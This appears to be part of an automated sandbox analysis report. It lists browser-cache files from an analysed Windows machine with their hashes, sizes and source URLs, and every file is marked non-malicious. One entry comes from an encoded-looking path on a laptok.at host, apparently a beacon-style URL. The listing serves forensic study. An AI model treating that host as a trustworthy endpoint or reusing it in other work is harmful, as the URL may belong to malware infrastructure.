                                                                                SHA-256:2A10D6E97830278A13CD51CA51EC01880CE8C44C4A69A027768218934690B102
                                                                                SHA-512:9D12A0F8D9844F7933AA2099E8C3D470AD5609E6542EC1825C7EEB64442E0CD47CDEE15810B23A9016C4CEB51B40594C5D54E47A092052CC5E3B3D7C52E9D607
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1cEP3G[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):1103
                                                                                Entropy (8bit):7.759165506388973
                                                                                Encrypted:false
                                                                                SSDEEP:24:sWl+1qOC+JJAmrPGUDiRNO20LMDLspJq9a+VXKJL3fxYSIP:sWYjJJ3rPFWToEspJq9DaxWSA
                                                                                MD5:18851868AB0A4685C26E2D4C2491B580
                                                                                SHA1:0B61A83E40981F65E8317F5C4A5C5087634B465F
                                                                                SHA-256:C7F0A19554EC6EA6E3C9BD09F3C662C78DC1BF501EBB47287DED74D82AFD1F72
                                                                                SHA-512:BDBAD03B8BCA28DC14D4FF34AB8EA6AD31D191FF7F88F985844D0F24525B363CF1D0D264AF78B202C82C3E26323A0F9A6C7ED1C2AE61380A613FF41854F2E617
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1cG73h[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):917
                                                                                Entropy (8bit):7.682432703483369
                                                                                Encrypted:false
                                                                                SSDEEP:24:k/6yDLeCoBkQqDWOIotl9PxlehmoRArmuf9b/DeyH:k/66oWQiWOIul9ekoRkf9b/DH
                                                                                MD5:3867568E0863CDCE85D4BF577C08BA47
                                                                                SHA1:F7792C1D038F04D240E7EB2AB59C7E7707A08C95
                                                                                SHA-256:BE47B3F70A0EA224D24841CB85EAED53A1EFEEFCB91C9003E3BE555FA834610F
                                                                                SHA-512:1E0A5D7493692208B765B5638825B8BF1EF3DED3105130B2E9A14BB60E3F1418511FEACF9B3C90E98473119F121F442A71F96744C485791EF68125CD8350E97D
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dH21O[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):17198
                                                                                Entropy (8bit):7.959370766684027
                                                                                Encrypted:false
                                                                                SSDEEP:384:eRnGu25NOudfN0mbDSNnJXbibbXKw2fQE9K+V8lW55JOamB2xsawh6YE:eRnZ25N9iNVibmw24E9K+mlW5OfB6whG
                                                                                MD5:E6106B7FCDC35BB6B123E458C2F5E262
                                                                                SHA1:5C6E4F1A448E4AD7AA6BA86EE3FCAA40D924DF68
                                                                                SHA-256:D22C89730234F5F2E500994219556C87DA6033977994BB255C917549FD413D39
                                                                                SHA-512:10CDE7B6CBD030C86BE29E41250B28422309C0867A12B2857690D6BA732863F64C30F0061212A0D3079B7E4D68585512CEA6F54670E8EB2B4493196A8D28E721
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dH21O.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=519&y=456
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHaHG[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):5684
                                                                                Entropy (8bit):7.901511795711112
                                                                                Encrypted:false
                                                                                SSDEEP:96:BGAaE27cDmX5DT7d6xBGuNn7y1TXoXuOXvWs26InQ1Gk9VYflXmHJOTcc:BCb7/DT7Jut6TXOuO/zXHVYflXmHJEcc
                                                                                MD5:4552A8E698067AEE24526FDFB04388A4
                                                                                SHA1:457F9DA379F4148557B735037395864F0F916804
                                                                                SHA-256:52AA5CE1C43C0B4EA811E6B0160A69C62AD37F2B86BEDAFE5E18F87C7E6719C4
                                                                                SHA-512:40DB00C7E4366A303FEF6B37B57B87CFF7CDE090BD3511D66B86666C04628D45F8AC609FB7C080CEBA6AEBBED2B1B0BEFD134573F4BB320E2D2D5F107CF96073
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHaHG.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=606&y=211
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHgEB[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):5189
                                                                                Entropy (8bit):7.880140257901953
                                                                                Encrypted:false
                                                                                SSDEEP:96:BGEE6zMUpF8ABIADVxZtzrvCushprODsvk87jtjLNUQv8MdE:BFnTpIOlzuXnvkUtjtdE
                                                                                MD5:74B167BF2E58CD68DEF244DEC6D743B0
                                                                                SHA1:9C5C5937A028D6509D547A6BE903843E89BEFF05
                                                                                SHA-256:24EF6B7ADC8621B0E7A4B9DA591308E941A1DF49665B5B524774E8288779586D
                                                                                SHA-512:6C9F1EE729C8B94CB6063AAB9C068B2F1FBAEC64887D524CB64AB852EA7FB463FDD54DFF50419F754E7288E36DAF05264F90526F1F450200B3154ACAEAAFE153
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHgEB.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHhSJ[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):7289
                                                                                Entropy (8bit):7.9374002451816015
                                                                                Encrypted:false
                                                                                SSDEEP:192:xCLv/XU8uZlJbhluzlAjzotkuXrkVOfjVHm2vu6qnr00otj:ULvPUjB2xuh7oVG2/ySj
                                                                                MD5:0CC4BBA7173007E90589461E4A7179EF
                                                                                SHA1:A943E2298F1F9123D97D9D198FD61F6F62695CB0
                                                                                SHA-256:516702589A5B41C91F0D6C7C18DB3800B7CB6CF5612E88FC50572411B0FB8B45
                                                                                SHA-512:1A433E36F6FFBC6F6076F07755BA0102281B44FAAA52C36608EC0D1A1B3EF3DE402BEE5730457AF9D631DC85EA6F5A424F6CBE9DFBC15F8D351EF7F35BB85665
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHhSJ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=643&y=233
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHqH1[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):16727
                                                                                Entropy (8bit):7.890731722624281
                                                                                Encrypted:false
                                                                                SSDEEP:384:7IPFhwGyK16xlANXd2j/RE9kYgo7jE/BpTZ2pK5olFh0UU:7IPwGy61Uj297gvT6KKT6UU
                                                                                MD5:AD771B594D8435B72EC3C554C8D24559
                                                                                SHA1:EF20299A044277D48BA2F7A48DAD911C9203961E
                                                                                SHA-256:3C22853E71F5E3D4E9720B982F816E98A9CFCA3283DBC850807874B376E6EBDE
                                                                                SHA-512:EF68769687686F4CE35982762F1BBDA9914CAC0A37E5CCC9B807BE61A2723588500D73EA8D634437B5AD988BD9A40B2A5BE56387AD5F2AB9650616324F290C79
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqH1.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHqXn[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):5155
                                                                                Entropy (8bit):7.884981534752541
                                                                                Encrypted:false
                                                                                SSDEEP:96:BGEEKAk3IimJteJyyZcatdZHhhi26KaFt+91g7b29naf9XY8Z93:BF5bmJtPyFDHhhi2vaFWKn2FaNx93
                                                                                MD5:D37A6D6D42BF661E89BA76D5E4344D6A
                                                                                SHA1:1BC1AAA2D7C234F1D5320C6D3AD60299AF3CC92D
                                                                                SHA-256:34B999BC98D0AC6A01AD86A32B08DE24FCCC28BF97143E05CF753918D31D82FC
                                                                                SHA-512:8AB3404EDF3447FFC91376AE0501D7D87E573042A65BB3CDB589F07FC3072CC48DDBA87157A7968E34D06588F6CE27936A2001DBDF6C121C263FF3E92FAAD06F
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqXn.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHrlW[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):7812
                                                                                Entropy (8bit):7.9211678774758845
                                                                                Encrypted:false
                                                                                SSDEEP:192:BCpFt0hwMHqym7V6XclWEdiXFL94BxGyFfIx4:k9awMHZBXAWqyf4zZF44
                                                                                MD5:38E61C71122A35B71CF2E7BF2B3AA948
                                                                                SHA1:B6EEF9ACA7B390E89CD5F407C8170F71ACA4D78B
                                                                                SHA-256:ABBBBF9F97547C8745B0C1B4D77F174663DF516AC5285D71CB013CC4186D5FEE
                                                                                SHA-512:60DBE302287D0CCF6BD494CC24DBD1337E89EF573C392EE076FA48230DD60B452660155437181FD5C5D9092B1255C5E3350D2BDEAD8F7D33976A3AD1D82FAFB9
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHrlW.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dHyAs[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):11152
                                                                                Entropy (8bit):7.92901635138022
                                                                                Encrypted:false
                                                                                SSDEEP:192:BYmHhm5jV01uSJ2iqXTQfrvld5/nXCwxMuhMUBD8z/KuCwqUIA92TOd:esk5GuZ/UfhvXXxMuhMCDCQwCqOOd
                                                                                MD5:E7E206EF14A3B490BB30DE9149B7949B
                                                                                SHA1:E71B83FCEA5082A8EE6F13B72EE6B0A3B5E93D7E
                                                                                SHA-256:B98268475BC4D47A3ABEE343CB4A3A08F41D6FF6C70730D9675384313147E995
                                                                                SHA-512:A15C65817A610E368B9482E9971BCACD158E69E75353694F2C48372E76E12FDCFA069EAA718682D8B1018F23D9EEBE34729BF7051604D7B833E20E23F7186DD5
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHyAs.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1739&y=1314
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB1dh0Dw[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):9844
                                                                                Entropy (8bit):7.891530802314201
                                                                                Encrypted:false
                                                                                SSDEEP:192:BYF3+qr8jm6cpYR0n/FlCKmlFbnz2cuorGI3R1iteeyBzBh:ecqEmwun/OX+cDrf3R++p
                                                                                MD5:BDD857AD359507964F7924F19F7AF7BA
                                                                                SHA1:6B747CD408FD72368076FD854D085223DA1469AC
                                                                                SHA-256:9199049EB46392B2508174B7F8C43156BFF001C79D72E70A997877A8D95A402B
                                                                                SHA-512:0E7C6257AE8A38D8DD54DB75842F4A0BCAD038BF1E2383CD95C7A5C2C220E0EAD79B3184F6B59939983D0199B994390DAD6B774BE6E0FCC70BCE29995AEF6009
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dh0Dw.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1671&y=1717
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BB6Ma4a[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):396
                                                                                Entropy (8bit):6.789155851158018
                                                                                Encrypted:false
                                                                                SSDEEP:6:6v/lhPkR/CnFPFaUSs1venewS8cJY1pXVhk5Ywr+hrYYg5Y2dFSkjhT5uMEjrTp:6v/78/kFPFnXleeH8YY9yEMpyk3Tc
                                                                                MD5:6D4A6F49A9B752ED252A81E201B7DB38
                                                                                SHA1:765E36638581717C254DB61456060B5A3103863A
                                                                                SHA-256:500064FB54947219AB4D34F963068E2DE52647CF74A03943A63DC5A51847F588
                                                                                SHA-512:34E44D7ECB99193427AA5F93EFC27ABC1D552CA58A391506ACA0B166D3831908675F764F25A698A064A8DA01E1F7F58FE7A6A40C924B99706EC9135540968F1A
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBPfCZL[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:GIF image data, version 89a, 50 x 50
                                                                                Category:downloaded
                                                                                Size (bytes):2313
                                                                                Entropy (8bit):7.594679301225926
                                                                                Encrypted:false
                                                                                SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                MD5:59DAB7927838DE6A39856EED1495701B
                                                                                SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBRUB0d[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):489
                                                                                Entropy (8bit):7.174224311105167
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/aKTthjwzd6pQNfgQkdXhSL/KdWE3VUndkJnBl:bTt25hkuSMoGd6
                                                                                MD5:315026432C2A8A31BF9B523357AE51E0
                                                                                SHA1:BD4062E4467347ED175DB124AF56FC042801F782
                                                                                SHA-256:3CC29B2E08310486079BD9DD03FC3043F2973311CE117228D73B3E7242812F4F
                                                                                SHA-512:3C8BCF1C8A1DB94F006278AC678A587BCDE39FE2CFD3D30A9CDA2296975425EA114FCB67C47B738B7746C7046B955DCC92E5F7611C6416F27DA3E8EAED87565E
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBX2afX[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):688
                                                                                Entropy (8bit):7.578207563914851
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/74//aaICzkSOms9aEx1Jt+9YKLg+b3OI21P7qO1uCqbyldNEiA67:BPObXRc6AjOI21Pf1dNCg
                                                                                MD5:09A4FCF1442AD182D5E707FEBC1A665F
                                                                                SHA1:34491D02888B36F88365639EE0458EDB0A4EC3AC
                                                                                SHA-256:BE265513903C278F9C6E1EB9E4158FA7837A2ABAC6A75ECBE9D16F918C12B536
                                                                                SHA-512:2A8FA8652CB92BBA624478662BC7462D4EA8500FA36FE5E77CBD50AC6BD0F635AA68988C0E646FEDC39428C19715DCD254E241EB18A184679C3A152030FD9FF8
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBi9ul[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):604
                                                                                Entropy (8bit):7.470115168475598
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/7ee/HBU7gGAvYHFHd5h4Fm2ga2N6PcJ8Fjb9co6s9:ABUclvNmNmcJ8Rb979
                                                                                MD5:BF5346883F3E73C6E9AC202F6D64176A
                                                                                SHA1:BCC5BB62647C91477F484497DE68FC811EBB107D
                                                                                SHA-256:D99E67EEFAC33F8821AE3FF3244CA23153EF4DF0816FA19BF913529E0B5B62B7
                                                                                SHA-512:F081356AD5B9C06340E31B41CF98CBCD0C2D36468A821952CED051315535EB218EDCA6591E9BEA24A0AB3639FDA2B0E0D22E473753D135123365D8622BA47814
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9ul.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\BBkwUr[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):431
                                                                                Entropy (8bit):7.092776502566883
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/kFkUgT6V0UnwQYst4azG487XqYsT:YgTA0UnwMM487XqZT
                                                                                MD5:D59ADB8423B8A56097C2AE6CBEDBEC57
                                                                                SHA1:CAFB3A8ABA2423C99C218C298C28774857BEBB46
                                                                                SHA-256:4CC08B49D22AF4993F4B43FD05DE6E1E98451A83B3C09198F58D1BAFD0B1BFC3
                                                                                SHA-512:34001CBE0731E45FB000E31E45C7D7FEE039548B3EA91EBE05156A4040FA45BC75062A0077BF15E0D5255C37FE30F5AE3D7F64FDD10386FFBB8FDB35ED8145FC
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\E[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):270440
                                                                                Entropy (8bit):5.999927116066864
                                                                                Encrypted:false
                                                                                SSDEEP:6144:Y+0C7j1OHxuaO32a5uF6e/jwm+JBJk18h++os7c2Wq/:YQ9Oc35663Xxb157cI/
                                                                                MD5:E924EC561FB47C3C0077569F989E9945
                                                                                SHA1:7B779431CDFB4199AB382029420C49A8E7145CBD
                                                                                SHA-256:620F9E87417B9B64C9CA5D8C86EADC68BE4EFBCD4F829857AA3E88CBCF8FFCEA
                                                                                SHA-512:61258962ADD49591F56ADE96442EF93067AB937903798757CE620AE1B6A7E05FCB4703A3CC25764A71963BC848E9924B20631A88511E48F0C93BF24AA079941A
                                                                                Malicious:false
                                                                                IE Cache URL:http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\a8a064[1].gif
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:GIF image data, version 89a, 28 x 28
                                                                                Category:downloaded
                                                                                Size (bytes):16360
                                                                                Entropy (8bit):7.019403238999426
                                                                                Encrypted:false
                                                                                SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                                                MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                                                SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                                                SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                                                SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\cf0f64e7-0354-429d-b700-c0cb0384258a[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):87750
                                                                                Entropy (8bit):7.971920862407236
                                                                                Encrypted:false
                                                                                SSDEEP:1536:rV71v5me8Il0WbASXD+HpcgZz9UoN2VXWmWZ8kiTbL/AR9v2jpW4JgJs:Z71RJl0WhXDEA5WTZt/MpTOu
                                                                                MD5:C664CC3A06C7E91256C992E6DBC7F38C
                                                                                SHA1:68D9D406B5536B88D3DE4B339E9E53FD546572B4
                                                                                SHA-256:8812FF9A4A6A6D35408460D10BF89FAC4BCB7DC44EDEA5067013789F544458F2
                                                                                SHA-512:00D7320664B6C0786534AF7E4D709926E1CC8627A6AFA6063A67234F4616B77F8F1460C6214B5B22C5CD1442C5B69705A18E7B0D8F82E3B0BB9A4DEE6943966C
                                                                                Malicious:false
                                                                                IE Cache URL:https://cvision.media.net/new/300x300/2/249/108/181/cf0f64e7-0354-429d-b700-c0cb0384258a.jpg?v=9
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):20808
                                                                                Entropy (8bit):5.301767642140402
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                Malicious:false
                                                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/cslogger.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\checksync[2].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:dropped
                                                                                Size (bytes):20808
                                                                                Entropy (8bit):5.301767642140402
                                                                                Encrypted:false
                                                                                SSDEEP:384:RqAGcVXlblcqnzleZSug2f5vzBgF3OZOsQWwY4RXrqt:+86qhbz2RmF3OssQWwY4RXrqt
                                                                                MD5:97A17EFCA6ECAE418CACBBF6AE41B0B1
                                                                                SHA1:31235CDB60298018C1C0D1EFE712FF3281A7B29B
                                                                                SHA-256:00FFE70B03F4DF3A0D653D15DF9DB3D4451AD931953B44F9541DD59D8538FD90
                                                                                SHA-512:DA7EE38B51F31BDA399E68AC9D6CA7532C846C7BF466E94F40CB7C6382F1A64F0567A3BCE85D12E1F37F84F4765FF703405309E6A545FE8D482B0EFEAAE9E525
                                                                                Malicious:false
